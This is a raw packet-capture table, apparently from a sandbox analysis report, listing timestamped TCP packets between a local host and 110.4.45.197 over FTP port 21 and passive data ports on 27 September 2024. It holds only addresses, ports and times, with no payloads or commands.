                                      Sep 27, 2024 13:12:46.366556883 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371115923 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371144056 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371170044 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371170044 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371186972 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371220112 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371220112 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371248007 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371274948 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371280909 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371303082 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371309996 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371330976 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371341944 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371367931 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371390104 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371445894 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371478081 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371494055 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371504068 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371531010 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371575117 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376236916 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376451015 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376498938 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376528025 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376559019 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376605034 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376635075 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376678944 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376708031 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.377135038 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.377182961 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.467490911 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:47.265567064 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:47.318897963 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:52.298134089 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:52.303175926 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:52.303256989 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:53.126218081 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:53.126368999 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:53.132963896 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:53.454895973 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:53.456473112 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:53.462038994 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:53.820796013 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:53.824496984 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:53.829380035 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:54.150491953 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:54.152523041 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:54.157500029 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:54.480330944 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:54.480482101 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:54.486978054 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:54.806366920 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:54.806555033 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:54.811742067 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:55.133074045 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:55.133421898 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:55.138619900 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:55.138688087 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:55.138752937 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:55.143568039 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:55.714776993 CEST4977921192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:55.719839096 CEST2149779110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:55.720567942 CEST4977921192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:55.720567942 CEST4977921192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:55.725646973 CEST2149779110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:55.731033087 CEST4977921192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.066729069 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.071171999 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.076201916 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076231003 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076256990 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076370001 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076397896 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076401949 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.076445103 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076457977 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.076472044 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076502085 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.076549053 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076575041 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076584101 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.076605082 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076725006 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.081594944 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081624031 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081671000 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081698895 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081724882 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081751108 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081777096 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.081778049 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.081798077 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081825018 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081836939 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.081851006 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081873894 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.081907034 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.081923008 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081984043 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.082031012 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.082058907 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.082081079 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.082916975 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.086818933 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.086847067 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.086941004 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.086987972 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087018013 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087100029 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087146044 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087172031 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087218046 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087244034 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087830067 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.088073015 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.094624996 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.156761885 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.997684002 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:57.115677118 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:57.608388901 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:57.613449097 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:57.973038912 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:57.976418018 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:57.981611013 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:57.981709003 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:57.981863976 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:57.986726999 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.811820030 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.812227964 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817228079 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817259073 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817286968 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817336082 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817394972 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817423105 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817450047 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817456961 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817481995 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817507029 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817531109 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817537069 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817564011 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817590952 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817620993 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817627907 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817706108 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822483063 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822547913 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822565079 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822613001 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822617054 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822640896 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822666883 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822668076 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822695017 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822701931 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822731018 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822757006 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822765112 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822793007 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822839975 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822855949 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822866917 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822895050 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822920084 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822979927 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.823007107 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.827539921 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.827780008 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.827832937 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.827999115 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828028917 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828079939 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828107119 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828152895 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828177929 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828376055 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828430891 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:59.053177118 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:59.608923912 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:59.741053104 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:15.246606112 CEST4978121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:15.253818989 CEST2149781110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:15.255680084 CEST4978121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:15.255680084 CEST4978121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:15.261090040 CEST2149781110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:15.267432928 CEST4978121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:26.072145939 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:26.077079058 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:26.452203989 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:26.452831984 CEST4978251546192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:26.460716009 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:26.460778952 CEST4978251546192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:26.460886002 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:26.466106892 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.453784943 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.461007118 CEST4978251546192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:27.468913078 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.469073057 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.469100952 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.469213009 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.469239950 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.469320059 CEST4978251546192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:27.469579935 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.469588995 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.469594955 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.469603062 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.469690084 CEST4978251546192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:27.469692945 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.475007057 CEST4978251546192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:27.481846094 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.481857061 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.481868029 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.481889009 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.481897116 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.481905937 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.481914043 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.481920004 CEST4978251546192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:27.481921911 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.481930971 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.481935024 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.481939077 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.481983900 CEST4978251546192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:27.482739925 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.486968994 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.488734007 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.488749981 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.488758087 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.488902092 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.489161015 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.489168882 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.489906073 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.491203070 CEST4978251546192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:27.553255081 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:28.407711029 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:28.553220987 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:43.310105085 CEST4978321192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:43.376849890 CEST2149783110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:43.378640890 CEST4978321192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:43.381428957 CEST4978321192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:43.386570930 CEST2149783110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:43.386666059 CEST4978321192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:44.648521900 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:44.677779913 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.057925940 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.059056997 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.075129032 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.075202942 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.077049971 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.082439899 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.984015942 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.984380960 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.989547014 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.989639997 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.989670038 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.989696980 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.989722013 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.989723921 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.989753008 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.989772081 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.989803076 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.989806890 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.989833117 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.989859104 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.989891052 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.989933968 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.989969015 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.994796038 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.995007038 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.996397972 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.996449947 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.996476889 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.996509075 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.996534109 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.996536016 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.996577024 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.996634960 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:45.997206926 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:45.997392893 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:46.000174999 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:46.002537966 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:46.002566099 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:46.002593994 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:46.002619982 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:46.003479004 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:46.003695965 CEST5666849784110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:46.003900051 CEST4978456668192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:46.037661076 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:46.922559023 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:47.053344965 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:52.715584040 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:52.721434116 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.077083111 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.077557087 CEST4978561759192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.082598925 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.082673073 CEST4978561759192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.082746029 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.087680101 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.282509089 CEST4978621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.287573099 CEST2149786110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.287687063 CEST4978621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.287988901 CEST4978621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.293046951 CEST2149786110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.294898033 CEST4978621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.906615019 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.906888962 CEST4978561759192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.911917925 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.911947966 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.911994934 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.912020922 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.912025928 CEST4978561759192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.912065029 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.912069082 CEST4978561759192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.912097931 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.912177086 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.912203074 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.912211895 CEST4978561759192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.912236929 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.912252903 CEST4978561759192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.912283897 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.912487984 CEST4978561759192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.917006969 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.917133093 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.917263031 CEST4978561759192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.917300940 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.917349100 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.917411089 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.917438030 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.917464018 CEST4978561759192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.917470932 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.917536020 CEST4978561759192.168.2.4110.4.45.197
